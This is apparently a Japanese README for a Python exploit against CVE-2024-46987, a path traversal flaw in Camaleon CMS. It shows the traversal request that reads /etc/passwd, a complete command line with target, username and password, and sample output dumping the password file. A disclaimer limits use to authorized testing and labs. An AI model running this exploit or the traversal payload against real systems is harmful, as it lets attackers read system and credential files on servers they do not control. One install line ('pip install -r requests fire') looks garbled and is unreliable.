
Pythonで作成されたエクスプロイト
CVE-2024-46987 は、Camaleon CMS(Ruby on Rails ベースのコンテンツ管理システム)における認証済みパストラバーサル脆弱性(CWE-22)です。これにより、ログイン済みユーザー(低権限でも)が MediaController#download_private_file アクションを介してサーバー上の任意のファイルを読み取ることができます。
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N有効な認証情報を持つ攻撃者は、次のような細工されたリクエストを送信できます: /admin/media/download_private_file?file=../../../../etc/passwd
pip install -r requirements.txtまたは
pip install -r requests firepython cms-exploit.py \
--url http://target.local \
--username neal \
--password 'Caffery@123' \
--cmd /etc/passwd
[+] Login successful
[*] Requesting: http://target.local/admin/media/download_private_file?file=../../../etc/passwd
[+] Success – content:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
.
.
注記: このスクリプトはRailsスタイルのログインフォーム(user[email]、user[password]、authenticity_token)を想定しています。ターゲットがカスタム名を使用している場合は、ペイロードのフィールドを調整してください。
このツールは、教育目的および許可されたセキュリティテストの目的でのみ提供されます。
所有しているシステム、または明示的な書面によるテスト許可を得たシステム(例: バグバウンティプログラム、内部ペンテスト、HTBなどのラボ)でのみ使用してください。
不正使用は法律に違反する可能性があります。
作者は誤用について責任を負いません。